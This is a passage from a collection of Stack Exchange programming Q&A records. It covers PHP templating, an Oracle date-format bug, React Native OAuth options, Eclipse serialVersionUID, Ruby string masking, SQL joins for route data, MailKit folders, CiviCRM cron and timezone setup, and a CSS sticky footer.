$Text->truncate($review['Listing']['title'],$listing_title_chars) : $review['Listing']['title'];\n $review_title = ($review_title_chars && mb_strlen($review['Review']['title'])>$review_title_chars) ? $Text->truncate($review['Review']['title'],$review_title_chars) : $review['Review']['title'];\n $link_title = str_replace('{listing_title}',$listing_title,$link_title_format);\n $link_title = str_replace('{review_title}',$review_title,$link_title);\n\n \/\/ Create the thumbnail\n $tn_show and $mainMediaThumb = $Media->thumb(Sanitize::getVar($review,'MainMedia'),array('listing'=>$review,'size'=>$tn_size,'mode'=>$tn_mode,'css_size'=>true));\n ?>\n\n <?php $lastItem = ($i == $columns) ? ' jrLastItem' : ''; ?>\n\n <div class=\"jrModuleItem<?php echo $lastItem; ?>\" style=\"width: <?php echo $item_width; ?>%; padding-right: <?php echo $item_padding; ?>%;\">\n\n <?php if($show_numbers):?><div class=\"jrModuleItemNumber\"><?php echo $j;?>.<\/div><?php endif;?>\n\n <?php if($tn_show && $mainMediaThumb && $tn_position != 'bottom'):?>\n\n <!-- Listing Thumbnail -->\n <div class=\"jrModuleItemThumbnail\">\n <?php echo $Html->sefLink($mainMediaThumb,$review['Listing']['url']);?>\n <?php \/\/ Uncomment line below to show reviewer avatar. You can comment or remove the thumbnail code above\n \/\/ echo $Community->avatar($review);\n ?>\n <\/div>\n\n <?php endif;?>\n\n <div class=\"jrModuleItemContent\">\n\n <!-- Listing Title -->\n <div class=\"jrModuleItemTitle\">\n\n <?php echo $Html->sefLink($link_title,$review['Listing']['url']);?>\n\n <?php if(Sanitize::getString($review['Listing'],'tag')):?>\n\n <span class=\"jrComponentLabel jrStatusLabel jrBlue\">\n\n <?php echo Sanitize::getString($review['Listing'],'tag');?>\n\n <\/span>\n\n <?php endif;?>\n\n <\/div>\n\n <!-- Rating -->\n <?php if ( $review['Criteria']['state'] == 1 ):?>\n <div class=\"jrOverallRatings\">\n <?php if($review['Review']['editor'] == 1):?>\n <?php\n $rating_stars = $Rating->drawStars($review['Rating']['average_rating'], $this->Config->rating_scale, 'editor');\n $rating_value = $Rating->round($review['Rating']['average_rating'],$this->Config->rating_scale);\n ?>\n <div class=\"jrOverallEditor\" title=\"<?php __t(\"Editor rating\"); ?>\">\n <div class=\"jrRatingStars\"><?php echo $rating_stars ?><\/div>\n <span class=\"jrRatingValue\"><?php echo $rating_value?><\/span>\n <\/div>\n <?php else:?>\n <?php\n $rating_stars = $Rating->drawStars($review['Rating']['average_rating'], $this->Config->rating_scale, 'user');\n $rating_value = $Rating->round($review['Rating']['average_rating'],$this->Config->rating_scale);\n ?>\n <div class=\"jrOverallUser\" title=\"<?php __t(\"User rating\"); ?>\">\n <div class=\"jrRatingStars\"><?php echo $rating_stars ?><\/div>\n <span class=\"jrRatingValue\"><?php echo $rating_value?><\/span>\n <\/div>\n <?php endif;?>\n <\/div>\n <?php endif;?>\n\n <!-- Reviewer name -->\n <div class=\"jrModuleItemReviewer\">\n <span class=\"reviewer\"><?php __t(\"Reviewed by\");?> <?php echo $Community->screenName($review);?><\/span>\n <\/div>\n\n <?php if($fields): ?>\n\n <!-- Custom Fields -->\n <div class=\"jrModuleFields\">\n\n <?php\n foreach ($fields as $field):\n $field = trim($field);\n $field_value = $CustomFields->field($field,$review);\n ?>\n <?php if($field_value != ''):?>\n <div class=\"jrModuleFieldDiv <?php echo lcfirst(Inflector::camelize($field)); ?>\">\n <span class=\"jrModuleFieldTitle\"><?php echo $CustomFields->label($field, $review); ?>: <\/span>\n <span class=\"jrModuleFieldValue\"><?php echo $field_value; 
?><\/span>\n <\/div>\n <?php endif;?>\n\n <?php endforeach; ?>\n\n <\/div>\n\n <?php endif;?>\n\n <?php if($show_comments && trim($review['Review']['comments'])!=''):?>\n <!-- Review Comments -->\n <div class=\"jrModuleItemInfo\">\n <?php\n \/\/ Uncomment line below to show review title\n \/\/ echo '<strong>' . $review['Review']['title'] . '<\/strong><br \/>';\n ?>\n <span class=\"comments\">\"<?php echo $Text->truncateWords($review['Review']['comments'],$comments_words,'...');?>\"<\/span>\n <\/div>\n <?php endif;?>\n <\/div>\n\n <?php if($tn_show && $mainMediaThumb && $tn_position == 'bottom'):?>\n\n <!-- Listing Thumbnail -->\n <div class=\"jrModuleItemThumbnail\">\n <?php echo $Html->sefLink($mainMediaThumb,$review['Listing']['url']);?>\n <?php \/\/ Uncomment line below to show reviewer avatar. You can comment or remove the thumbnail code above\n \/\/ echo $Community->avatar($review);\n ?>\n <\/div>\n\n <?php endif;?>\n\n <\/div>\n\n <?php \/*end of row , start new row*\/\n if(!empty($page) && ($i == $columns || $total == $j)):?>\n <div class=\"jrDivider\"><\/div>\n <?php $i=0; endif;?>\n\n <?php endwhile;?>\n\n <\/div>\n\n <?php endforeach; \/* new page ends here *\/?>\n\n<\/div><?php \/* end items root element *\/?>\n<\/code>\n\nDoes any one have the slightest idea how i could turn this into a for loop that outputs a table?\nComment: You **might** be able to hack something together with output buffering and regex to replace divs with table cells, but i expect you will find it easier to just plough through the above code and replace the divs with tables\nComment: Thanks very much for the answer, yeah i've been edit the divs trying to render a table, but its driving me mad at the moment ha,\nAnswer: The quickest path from A to B is to edit the attached code to render a table versus stacked divs.\n* EDIT *\nThe answer to your comment isn't so simple as replace all of 'A' with 'B.' A div is a \"self-contained\" HTML element while a table is a grouping with syntax rules.\nAn HTML table is constructed like so:\n<code><table>\n <thead>\n <tr>\n <th>Header 1<\/th>\n <th>Header 2<\/th>\n <\/tr>\n <\/thead> \n <tbody>\n <tr>\n <td>Row 1 - Column 1<\/td>\n <td>Row 1 - Column 2<\/td>\n <\/tr>\n <tr>\n <td>Row 2 - Column 1<\/td>\n <td>Row 2 - Column 2<\/td>\n <\/tr>\n <\/tbody>\n<\/table>\n<\/code>\nThe foreach loop in your code should create a row through each iteration. Which means you need to render your table, thead and tbody tags outside of this looping code. Inside the loop, you render a new row each iteration, which requires an opening\/closing tag for the row and an opening\/closing for each column.\nHope this helps.\nComment: Thanks, but do i just go in and add at each div? lol seems to simple and messy thanks for your time\n","meta":{"source":"stackoverflow","title":"Editing a php scrip\u00e8t divs to output a table","dup_signals":{}},"subset":"stackexchange"} +{"text":"Generating date in Oracle using prepared statements\n\nQuestion: I have an interesting problem here. I'm trying to generate an XML date using the Oracle <code>to_char<\/code> command. 
When I do this using PL\/SQL everything works fine:\n<code>18:05:54 SQL> select to_char(sysdate, 'yyyy-mm-dd\"T\"hh24:mi:ss\".000Z\"') from dual;\n\nTO_CHAR(SYSDATE,'YYYY-MM-DDT\n---------------------------------------------------------------------------\n2014-04-10T23:09:50.000Z\n<\/code>\nHowever, when I put that date format into a Java program and use a prepared statement it throws a very strange and meaningless error of \"Missing IN OUT parameter at index:: 6\" which is strange because there are only 5 parameters. I know it is the date format because if I alter the format the command works fine.\nHere is my date format string and the one that works:\n<code>private static final String XML_DATE = \", 'YYYY-MM-DD\\\"T\\\"HH24:MM:SS\\\"Z\\\")\"; <-- BROKEN\n\nprivate static final String XML_DATE = \", 'YYYY-MM-DD HH24:MM:SS')\"; <-- Working\n<\/code>\nYou may notice that I needed to escape the quotation marks to keep them in the string.\nA little additional information. This string is inserted in-line from the main prepared statement. That's why it looks a little funny. So each line of my SQL statement looks like this:\n<code> \" NVL(to_char(flt.my_date_dtm\" + XML_DATE + \",'') my_date_dtm, \" +\n<\/code>\nThe actual error tossed is this:\n<code>java.sql.SQLException: Missing IN or OUT parameter at index:: 6\n<\/code>\nAgain, which is strange because there are 5 parameters. Anybody have any ideas as to why it's doing this?\nAnswer: You're missing a closing single-quote in the 'broken' one:\n<code>private static final String XML_DATE = \", 'YYYY-MM-DD\\\"T\\\"HH24:MM:SS\\\"Z\\\")\";\n ^\n<\/code>\nYou've also changed <code>MI<\/code> to <code>MM<\/code> in both the broken and working one versions. So it should be:\n<code>private static final String XML_DATE = \", 'YYYY-MM-DD\\\"T\\\"HH24:MI:SS\\\"Z\\\"')\";\n<\/code>\nNot sure if you've intentionally left out the <code>.000<\/code> part.\nI think that's throwing the parsing off and it's making a colon later in the constructed string be interpreted as a bind variable. As you aren't getting a missing-quote error you're presumably using this format twice in the final string (or an even number of times, anyway) so overall you do end up with valid strings. Kind of - long and meaningless, but with balanced quotes at least...\nWhen I see an error like that and can't immediately spot the problem, I usually write the final string out to console and try to run that through SQL*Plus, which tends to make the problem rather more obvious.\nComment: OMG! Thank you! You don't know how many people I've had look at this stupid statement and could not find that. Always helpful to have another pair of eyes!\nComment: \"and it's making a colon later in the constructed string be interpreted as a bind variable\"...\n\nOk, this solved my issue. I took the ' characters out of my prepared statement and my bind variables magically started working properly. 
Amazing!\n","meta":{"source":"stackoverflow","title":"Generating date in Oracle using prepared statements","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to use BuiltInParameters in react-native-app-auth to display auth screen in full screen\n\nQuestion: React native have library for external auth provide & below is configuration:-\n<code>import {\n authorize,\n} from 'react-native-app-auth';\nconst config = {\n issuer: 'https:\/\/xxxx.com:xxxx\/',\n clientId: 'xxxxx-ipad-local', \n redirectUrl: 'com.oms:\/oauthredirect',\n scopes: ['openid', 'profile', 'email', 'roles'],\n additionalParameters: {\n display : \"page\"\n }\n};\n<\/code>\nAsk is to show auth login screen to full screen as shown in options below from library which is not working. :-\n\nCan the login window which appears from library https:\/\/github.com\/FormidableLabs\/react-native-app-auth is customisable, As per library there are some option as shown in ablove screenshot but seems not working. Any clue will be really appreciated.\nAnswer: Check the options.\n<code>iosCustomBrowser?: 'safari' | 'chrome' | 'opera' | 'firefox';\nandroidAllowCustomBrowsers?: ('chrome' | 'chromeCustomTab' | 'firefox' | 'firefoxCustomTab' | 'samsung' | 'samsungCustomTab')[]\n<\/code>\nYour config will be like this for iOS as an example:\n<code>const config = {\n issuer: 'https:\/\/xxxx.com:xxxx\/',\n clientId: 'xxxxx-ipad-local', \n \/\/ iOS requires a trailing slash on redirectUrl\n redirectUrl: 'com.oms:\/oauthredirect\/',\n scopes: ['openid', 'profile', 'email', 'roles'],\n additionalParameters: {\n display : \"page\"\n },\n iosCustomBrowser: 'safari'\n};\n<\/code>\nThis will open the website in Safari with the same behaviour <code>Linking<\/code> opens a URL. You'll have to manage the redirect back to your app when you complete the authentication.\n","meta":{"source":"stackoverflow","title":"How to use BuiltInParameters in react-native-app-auth to display auth screen in full screen","dup_signals":{}},"subset":"stackexchange"} +{"text":"Is there a way to re-generate a serialVersionUID in Eclipse?\n\nQuestion: I know that Eclipse can create a new <code>serialVersionUID<\/code> when you don't yet have one, but I'm looking for a way to generate a new one after you made some changes.\nUnlike this question, I'm not looking for a tool to have it changed by itself, but rather a menu item \/ hotkey that does the trick. Anything faster than removing it and let Eclipse generate a new one would do.\nI'm aware of this Ant tool, but I prefer something in Eclipse.\nComment: ... and if you want to change it only sometimes, you can just make a random modification to this number -- assuming you do not release more often than once a day, this should be safe enough.\nComment: If you want it to change whenever you make some changes to the class then just remove it. serialVersionUID is intended for when you do not want it to change when you change the definition of the class.\nComment: I want it to change only when I make changes that affect the serializability.\nComment: Good point, that would be an acceptable answer in fact, didn't think of that.\nComment: @BevynQ `serialVersionUID` is intended as a way to version your class definitions, reliably, across compilers\/environments\/etc. Whether or not that matters depends on how serialization is being used, and whether or not the changes affect ser\/deser.\nComment: The answer is given so I can only give you a recommendation. 
Assuming you don't have releases every hour why do you even care if you break serializability _in between_ releases? You'll want to make sure the serialVersionUID changes when you release, though. Spring for example references a constant from all their serialVersionUIDs and the constant value is...the release version. I'm sure it gets updated automatically before the code is compiled during a release build.\nAnswer: Sadly, I do not know of any such plug-in available.\nHowever, the Ant tool you could create a single Ant script to modify your projects, and you can add that script either as an External tool (runnable from the menu of a project) or even as an incremental builder (that needs more time to set up correctly).\nI wrote a blog post some time ago, when I used an Ant script to generate code from EMF models automatically when the source models change. That script works fine in our codebase with a single known issue: the build is sometimes triggered unexpectedly...\nComment: Is it possible to use the Ant script for a single class?\nComment: Yes, it is. You can set properties using workspace variables - those variables can e.g. define the selected file for the Ant script.\n","meta":{"source":"stackoverflow","title":"Is there a way to re-generate a serialVersionUID in Eclipse?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How do I mask out letters that don't match what's expected?\n\nQuestion: My goal is to create a game of hangman. I wrote code similar to this:\n<code>c = []\nplayers_guess = gets\nb = \"example\"\nb.scan(\/.\/) {|letter| c << letter}\n\nc.each do |letter|\n if letter == players_guess\n puts letter\n else\n puts \"*\"\n end\nend \n<\/code>\nThe code checks if the player guessed the right letter from the password hidden in variable <code>c<\/code>, and then displays the password hidden behind the <code>*<\/code>s and only revealed guessed letters. But when I run the program, the result is always the same, it displays <code>players_guess<\/code>, and then gives seven <code>*<\/code>. What is wrong here?\nComment: What is wrong is your expectation that something different would happen :) What hint do you need?\nComment: i expected eg if players_guess = \"e\" it will display \"e*****e\". but it gives \"e*******\". and it displays the players_guess at the beginning like this no matter what letter or number i choose:(\nAnswer: Here's a simple way to do what you want:\n<code>word = \"example\"\nputs \"Type a letter: \"\nguess = gets.chomp\nputs word.tr(\"^#{guess}\", \"*\")\n<\/code>\nThis uses the <code>String#tr<\/code> method to replace all but the guess to <code>*<\/code>.\nThe output if you typed <code>e<\/code> would be <code>e*****e<\/code>.\nAnswer: Your If\/Then Logic is Wrong\nYour code is as follows:\n<code>c.each do |letter|\n if letter == players_guess\n puts letter\n else\n puts \"*\"\n end\nend\n<\/code>\nThe conditional will generally be false, since no single letter is likely to match the entire line retrieved by <code>gets<\/code>. 
As a result, you get an asterisk printed for each letter in c.\nSome Options to Fix Your Code\nYou can do a couple of things here.\n\nJust show the string if the strings are equal.\n<code>puts players_guess if b == players_guess.chomp\n<\/code>\nUse a counter in your loop to index into your arrays or strings.\n\nhttp:\/\/www.ruby-doc.org\/core-1.9.3\/String.html#method-i-index\nhttp:\/\/www.ruby-doc.org\/core-1.9.3\/Array.html#method-i-5B-5D\n\nSplit both strings into an array, and compare the arrays, printing letters that match or an asterisk on a non-match.\n<code>c.each_with_index do |char, idx|\n puts char == players_guess.scan(\/.\/)[idx] ? char : '*'\nend\n<\/code>\nComment: i don't know the methods you used here, but thanks anyway, i will do my best researching:)\n","meta":{"source":"stackoverflow","title":"How do I mask out letters that don't match what's expected?","dup_signals":{}},"subset":"stackexchange"} +{"text":"storing latitude and longitude for a route\n\nQuestion: I want to store a bunch of routes which consists of a pair of latitude and longitude series in a database. I want to be able to get all the routes for a given key.\nThe way my table is set up now is the following:\nRouteID Order Latitude Longitude\nbut a route can have many sets of latitude and longitude, so it becomes:\n<code>RouteID Order Latitude Longitude\n1 0 X Y\n1 1 X Y\n1 2 X Y\n1 3 X Y\n1 4 X Y\n2 0 X Y \n2 1 X Y \n<\/code>\nI have another table called R, which has RouteID and it references to this Route table.\nThe question is:\n1. Does this seems reasonable?\n\nIf not what is a better way of doing this\n\nUPDATE:\nSo the other table is called TEMP and it has the following format\nTempID RouteID UserID AttributeX AttributeY\nwhen I do a SQL:\n<code>SELECT R.LATITUDE, R.LONGITUDE\nFROM TEMP T, ROUTE R\nWHERE T.UserID =1\nORDER BY R.ORDER ASC ;\n<\/code>\nAnd in my table currently UserID 1 has two routes, but it prints out each lattitude twice.\nIs my SQL wrong? \nAnswer: This looks OK to me. \nBut don't pollute the world with a table named <code>R<\/code>. Think about the guy coming after you, what does <code>R<\/code> mean?\nThe other table should probably be named <code>Routes<\/code> and this table should probably be named <code>RoutePoints<\/code> or just <code>Points<\/code> or something else informative.\nAnd for the SQL, you have used a <code>CROSS JOIN<\/code> when you want to use a <code>INNER JOIN<\/code>:\n<code>SELECT R.LATITUDE, R.LONGITUDE\nFROM TEMP T INNER JOIN ROUTE R ON T.ROUTEID = R.ROUTEID\nWHERE T.UserID =1\nORDER BY R.ORDER ASC\n<\/code>\nThat might work.\nComment: Yea.. I just put R as an example here.\nComment: Good to hear! You had me worried there. But the structure looks fine! If you need additional fields, such as a calculated distance between the points - add them later!\nComment: I updated my question... mind helping out? My SQL skill is rusty\nComment: If I also want to see username\/userid then username\/userid will be shown for every column?. So this table is not 3NF?\nAnswer: Most likely you want to use a space-filling-curve or a spatial index. I use it to store postcode and query them with just 1 operator indepedent of the zoom-level. You are welcome to download my class at phpclasses.org ( hilbert-curve ).\nAnswer: A lot of it depends on what you want to do with this information after you have stored it. If you just want to print out a map for a given route, your table setups could be ok. 
If you wanted to know if two routes intersected or overlapped, you should probably learn more about Geogrpahic Information Systems (GIS). GIS Stackexchange is a good place to start asking questions.\n","meta":{"source":"stackoverflow","title":"storing latitude and longitude for a route","dup_signals":{}},"subset":"stackexchange"} +{"text":"filter default folder from Mailkit\/IMailFolder\n\nQuestion: I am trying to get all required folder using Mailkit\/IMailFolder. It gives me some unwanted folder like \"Calendar, Contacts etc.\", Is there any good way to filter that folder? because in such folder there is no email available and it is no use for me also it is not created by me it is default folders. \nI am using folder.GetSubfolders(false) method in c#. below is my code.\n<code>static List<IMailFolder> GetFolders(IMailFolder personal = null)\n {\n try\n {\n if (personal == null)\n {\n personal = MailManager.Instance.ImapClient.GetFolder(MailManager.Instance.ImapClient.PersonalNamespaces[0]);\n }\n return personal.GetSubfolders(false).ToList();\n }\n catch (Exception ex)\n {\n return null;\n }\n\n }\n<\/code>\nAnswer: You could use the following code snippet (which uses LINQ):\n<code>return personal.GetSubfolders (false).Where (x => X.Name != \"Calendar\" && x.Name != \"Contacts\").ToList ();\n<\/code>\nComment: Nope, because the IMAP protocol does not have any such property either.\nComment: Thanks for your reply. I want to know, Do we have any property available in IMailFolder which differentiate folder created by user and default?\n","meta":{"source":"stackoverflow","title":"filter default folder from Mailkit\/IMailFolder","dup_signals":{}},"subset":"stackexchange"} +{"text":"New install, system status says \"cron not running\" and \"timestamp mismatch\"\n\nQuestion: Running CiviCRM 4.7 on WordPress 4.7.3, hosted on a shared Linux server at 1and1.com. The WordPress site is using PHP 7.0 but apparently the latest version I can use from the command line is 5.5.\nTwo problems (perhaps related?)\nThe system status screen says \"Cron not running\". Cron is running. 
I currently have crontab sending me an email every 15 minutes using the cronTest.php file which contains this:\n<code><?php mail('firstname.lastname@example.com','Cron Job Test Script',phpversion()); ?>\n<\/code>\nThat is working, sending me the email and reporting PHP version 5.5.38.\nI'm also trying to use cli.php to execute the CiviCRM Job, but that doesn't seem to be working.\nHere's my whole crontab (with sensitive info changed):\n<code>*\/15 * * * * \/usr\/bin\/php5.5 \/mysharedserver\/homepages\/34\/d11111111\/htdocs\/cronTest.php\n*\/15 * * * * \/usr\/bin\/php5.5 \/mysharedserver\/homepages\/34\/d11111111\/htdocs\/mysubdir\/wp-content\/plugins\/civicrm\/civicrm\/bin\/cli.php -s mydomain.org -u cronuser -p cronuserpassword -e Job -a execute\n<\/code>\nI have also tried wget in crontab without success:\n<code>0 * * * * wget -O - -q -t 1 'http:\/\/mydomain.org\/wp-content\/plugins\/civicrm\/civicrm\/bin\/cron.php'?name=cronuser&pass=cronuserpassword@&key=mysitekey\n<\/code>\nI also tried wget with the single quote after the site key.\nThe timestamp error in CiviCRM system status says:\n<code>Timestamps reported by MySQL (eg \"2017-04-11 14:58\") and PHP (eg \"2017-04-11 18:58\" ) are mismatched\n<\/code>\nI have checked the PHP time using <code>date_default_timezone_get()<\/code> in the folder where WordPress is installed, and using SQL <code>CURTIME()<\/code> and <code>CURDATE()<\/code>, the times and dates match -- both show the time and date in New York. I have also created a php.ini in the directory where WordPress is running, with a directive setting the time to America\/New York:\n<code>date.timezone = \"America\/New_York\"\n<\/code>\nSo CiviCRM must be getting its PHP time somewhere other than in the directory where WordPress is installed? I thought maybe that would be the directory where PHP 5.5 is running, so I tried running the PHP function date_default_timezone_get() in \/usr\/bin\/php5.5 and got:\n<code>X-Powered-By: PHP\/5.5.38 Content-type: text\/html date_default_timezone_set: America\/New_York\n<\/code>\nUsing this SQL command:\n<code>SELECT @@global.time_zone, @@session.time_zone\n<\/code>\nI get SYSTEM for both values. I haven't pursued the SQL question any further than that, since the SQL time seems correct (New York time). \nI'm looks to me like the PHP time is the problem, but I'm not sure where to go from here.\nComment: Welcome! Although these both relate to your new installation this would be better asked as two separate questions, maybe with a link in each to the other.\nAnswer: The first thing I would check is the TimeZone setting in WP. Go to Settings--> General. That cannot be the default (UTC +0) as the default does not exist in php (UTC does, but not UTC +0). That should solve the TZ mismatch. Best to use one of these - http:\/\/php.net\/manual\/en\/timezones.america.php for NY I'd use <code>America\/New_York<\/code>\nAs far as cron, I recommend that you set it using the wp-cli method as detailed here: https:\/\/wiki.civicrm.org\/confluence\/display\/CRMDOC\/Managing+Scheduled+Jobs\nComment: Timestamp suggestion worked. Thank you! Still working on wp-cli. Tried to include additional questions in my original question but not sure if you could see it, so left my questions as a separate answer, too. 
Any help will be greatly appreciated.\nComment: Have put my wp-cli questions in a new post: http:\/\/civicrm.stackexchange.com\/questions\/18119\/cron-not-running-but-it-is-trying-to-use-wp-cli-in-crontab-with-wordpress\n","meta":{"source":"civicrm.stackexchange","title":"New install, system status says \"cron not running\" and \"timestamp mismatch\"","dup_signals":{}},"subset":"stackexchange"} +{"text":"Sticky Footer not fully stick on the bottom\n\nQuestion: I'm trying to add a sticky footer on my two-column content but the problem is it can't really fully occupy the bottom part of the page. \nI've been applying css sticky footer I found in the web but I can't make it to work. \nI've attached my code below.\nCodepen code here: I've add my code into Codepen Here\n\n<code><style> body {\n margin: 0;\n padding: 0;\n \/*background-image: url(\"main-bg.jpg\");*\/\n background-color:green;\n height: 100%;\n}\n.container {\n width: 100%;\n position: relative;\n margin-bottom: -50px;\n height: 100%;\n}\n\/* HEADER SECTION *\/\n\n.header {\n background-color:blue;\n \/*background-image: url(\"bgs.jpg\");\n background-repeat: repeat;\n background-size: cover;\n *\/\n height: 100px;\n overflow: auto;\n}\n.header ul {\n list-style-type: none;\n margin: 0;\n padding: 0;\n}\n.header ul li {\n float: right;\n padding: 14px 16px;\n}\n.header li ul {\n display: none;\n}\n.header a {\n text-decoration: none;\n color: white;\n font-size: 20px;\n}\n.header li:hover ul {\n display: block;\n}\n\/*FOOTER SECTION*\/\n\n.footer {\n clear: both;\n padding: 5px 5px;\n background: #cc9;\n height: 50px;\n}\n.footer-right {\n float: right;\n}\n.footer-left {\n float: left;\n}\n\/*CONTENT SECTION*\/\n\n.content {\n padding: 10px;\n padding-bottom: 50px;\n height: 100%;\n overflow: hidden;\n background-color:silver;\n width: 95%;\n}\n.left-content {\n float: left;\n width: 800px;\n padding: 10px;\n margin-left: 150px;\n margin-right: 20px;\n margin-top: 20px;\n margin-bottom: : 150px;\n \/*background-image:url(\"main-content-bg.png\");*\/\n background-color: white;\n -webkit-box-shadow: 8px -9px 20px 9px rgba(112, 112, 138, 0.69);\n -moz-box-shadow: 8px -9px 20px 9px rgba(112, 112, 138, 0.69);\n box-shadow: 8px -9px 20px 9px rgba(112, 112, 138, 0.69);\n}\n.right-content {\n float: right;\n width: 320px;\n padding: 10px;\n background: #99c;\n}\n#footer {\n clear: both;\n padding: 5px 5px;\n background: #cc9;\n height: 40px;\n}\n<\/style><\/code>\n<code><body>\n\n <div class=\"container\">\n\n <div class=\"header\">\n <br>\n <ul>\n <li><a href=\"#\">HOME<\/a>\n <\/li>\n <li><a href=\"#\">SERVICES<\/a>\n <\/li>\n <li><a href=\"#\">PORTFOLIO<\/a>\n <ul>\n <li><a href=\"#\">Birthday Events<\/a>\n <\/li>\n <li><a href=\"#\">Wedding Events<\/a>\n <\/li>\n <li><a href=\"#\">Anniversary Events<\/a>\n <\/li>\n <li><a href=\"#\">Other Events<\/a>\n <\/li>\n <\/ul>\n <\/li>\n <li><a href=\"#\">CONTACT<\/a>\n <\/li>\n <li><a href=\"#\">ABOUT<\/a>\n <\/li>\n <\/ul>\n <\/div>\n\n <div class=\"content\">\n <div class=\"left-content\">\n <p>All About Pixel Foto<\/p>\n <p>Nunc tincidunt, elit non cursus euismod, lacus augue ornare metus, egestas imperdiet nulla nisl quis mauris. Suspendisse a pharetra urna. Morbi dui lectus, pharetra nec elementum eget, vulputate ut nisi. Aliquam accumsan, nulla sed feugiat vehicula,\n lacus justo semper libero, quis porttitor turpis odio sit amet ligula. Duis dapibus fermentum orci, nec malesuada libero vehicula ut. 
Integer sodales, urna eget interdum eleifend, nulla nibh laoreet nisl, quis dignissim mauris dolor eget mi.\n Donec at mauris enim. Duis nisi tellus, adipiscing a convallis quis, tristique vitae risus. Nullam molestie gravida lobortis. Proin ut nibh quis felis auctor ornare. Cras ultricies, nibh at mollis faucibus, justo eros porttitor mi, quis auctor\n lectus arcu sit amet nunc. Vivamus gravida vehicula arcu, vitae vulputate augue lacinia faucibus. Donec volutpat nibh sit amet libero ornare non laoreet arcu luctus. Donec id arcu quis mauris euismod placerat sit amet ut metus. Sed imperdiet\n fringilla sem eget euismod. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Pellentesque adipiscing, neque ut pulvinar tincidunt, est sem euismod odio, eu ullamcorper turpis nisl sit amet velit.\n Nullam vitae nibh odio, non scelerisque nibh. Vestibulum ut est augue, in varius purus. Quisque ligulas ipsum, euismod atras vulputate iltricies etri elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.\n Nulla nunc dui, tristique in semper vel, congue sed ligula. Nam dolor ligula, faucibus id sodales in, auctor fringilla libero. Pellentesque pellentesque tempor tellus eget hendrerit. Morbi id aliquam ligula. Aliquam id dui sem. Proin rhoncus\n consequat nisl, eu ornare mauris tincidunt vitae. Vestibulum sodales ante a purus volutpat euismod. Proin sodales quam nec ante sollicitudin lacinia. Ut egestas bibendum tempor. Morbi non nibh sit amet ligula blandit ullamcorper in nec risus.\n Pellentesque fringilla diam faucibus tortor bibendum vulputate. Etiam turpis urna, rhoncus et mattis ut, dapibus eu nunc. Nunc sed aliquet nisi. Nullam ut magna non lacus adipiscing volutpat. Aenean odio mauris, consectetur quis consequat quis,\n blandit a nunc. Sed orci erat, placerat ac interdum ut, suscipit eu augue. Nunc vitae mi tortor. Ut vel justo quis lectus elementum ullamcorper volutpat vel libero.<\/p>\n <\/div>\n <div class=\"right-content\">\n <p align=\"center\">All About Me<\/p>\n <p>I'm Dick Roman and I foresee what I will become when I first time use a camera. I was eager to have my own camera and take elegant photos of my unforgettable moments in my life. 
It was served as my inspiration to purse and take this field of photography.\n Today I am able to render my services to my clients and I will guarantee every works I made will be best of the best<\/p>\n <ol style=\"list-style-type:none;align:center\">\n <p>Today I am rendering my skills as a:<\/p>\n <li>Image Editor<\/li>\n <li>Landscape Photograher<\/li>\n <li>Video Editor<\/li>\n <li>Web Designer<\/li>\n <\/ol>\n\n <p align=\"center\">You could drop-by to my social media profiles<\/p>\n <p align=\"center\">Just click on any links below to visit my account<\/p>\n\n <ul style=\"list-style-type:none\">\n <li>\n <a href=\"#\">Facebook<\/a>\n <\/li>\n <li><a href=\"#\">Twitter<\/a>\n <\/li>\n <li><a href=\"#\">Instagram<\/a>\n <\/li>\n <\/ul>\n <\/div>\n <\/div>\n\n <div class=\"footer\">\n <div class=\"footer-left\">\n <p>©Copyright 2016 - Codeblocks Design<\/p>\n <\/div>\n\n\n <div class=\"footer-right\">\n <p>\n <a href=\"#\">\n <img src=\"fb.png\" height=\"60%\">\n <\/a>\n <a href=\"#\">\n <img src=\"twitter.png\" height=\"60%\">\n <\/a>\n <a href=\"#\">\n <img src=\"instagram.png\" height=\"60%\">\n <\/a>\n <a href=\"#\">\n <img src=\"google.png\" height=\"60%\">\n <\/a>\n <\/p>\n <\/div>\n <\/div>\n\n <\/div>\n<\/body><\/code>\n\n\n\nHow the code above displayed on my browser:\nHere's the output\nComment: This has been answered [here](http:\/\/stackoverflow.com\/q\/42294\/5819195)\nAnswer: Remove <code><style><\/code> from your css it's invalid <code>selector<\/code>.\nFor sticky footer use <code>position:fixed<\/code> will make it stick to the bottom of the screen.\nHere is modified snippet.\n\n<code>*{\n margin:0px;\n padding:0px;\n}\n\nbody {\n margin: 0;\n padding: 0;\n \/*background-image: url(\"main-bg.jpg\");*\/\n background-color:green;\n height: 100%;\n}\n.container {\n width: 100%;\n position: relative;\n margin-bottom: -50px;\n height: 100%;\n}\n\/* HEADER SECTION *\/\n\n.header {\n background-color:blue;\n \/*background-image: url(\"bgs.jpg\");\n background-repeat: repeat;\n background-size: cover;\n *\/\n height: 100px;\n overflow: auto;\n}\n.header ul {\n list-style-type: none;\n margin: 0;\n padding: 0;\n}\n.header ul li {\n float: right;\n padding: 14px 16px;\n}\n.header li ul {\n display: none;\n}\n.header a {\n text-decoration: none;\n color: white;\n font-size: 20px;\n}\n.header li:hover ul {\n display: block;\n}\n\/*FOOTER SECTION*\/\n\n.footer {\n clear: both;\n padding: 5px 5px;\n background: #cc9;\n height: 50px;\n}\n.footer-right {\n float: right;\n}\n.footer-left {\n float: left;\n}\n\/*CONTENT SECTION*\/\n\n.content {\n padding: 10px;\n padding-bottom: 50px;\n height: 100%;\n overflow: hidden;\n background-color:silver;\n width: 95%;\n}\n.left-content {\n float: left;\n width: 800px;\n padding: 10px;\n margin-left: 150px;\n margin-right: 20px;\n margin-top: 20px;\n margin-bottom: : 150px;\n \/*background-image:url(\"main-content-bg.png\");*\/\n background-color: white;\n -webkit-box-shadow: 8px -9px 20px 9px rgba(112, 112, 138, 0.69);\n -moz-box-shadow: 8px -9px 20px 9px rgba(112, 112, 138, 0.69);\n box-shadow: 8px -9px 20px 9px rgba(112, 112, 138, 0.69);\n}\n.right-content {\n float: right;\n width: 320px;\n padding: 10px;\n background: #99c;\n}\n#footer {\n clear: both;\n padding: 5px 5px;\n background: #cc9;\n height: 40px;\n}\n<\/style><\/code>\n<code><body>\n\n <div class=\"container\">\n\n <div class=\"header\">\n <br>\n <ul>\n <li><a href=\"#\">HOME<\/a>\n <\/li>\n <li><a href=\"#\">SERVICES<\/a>\n 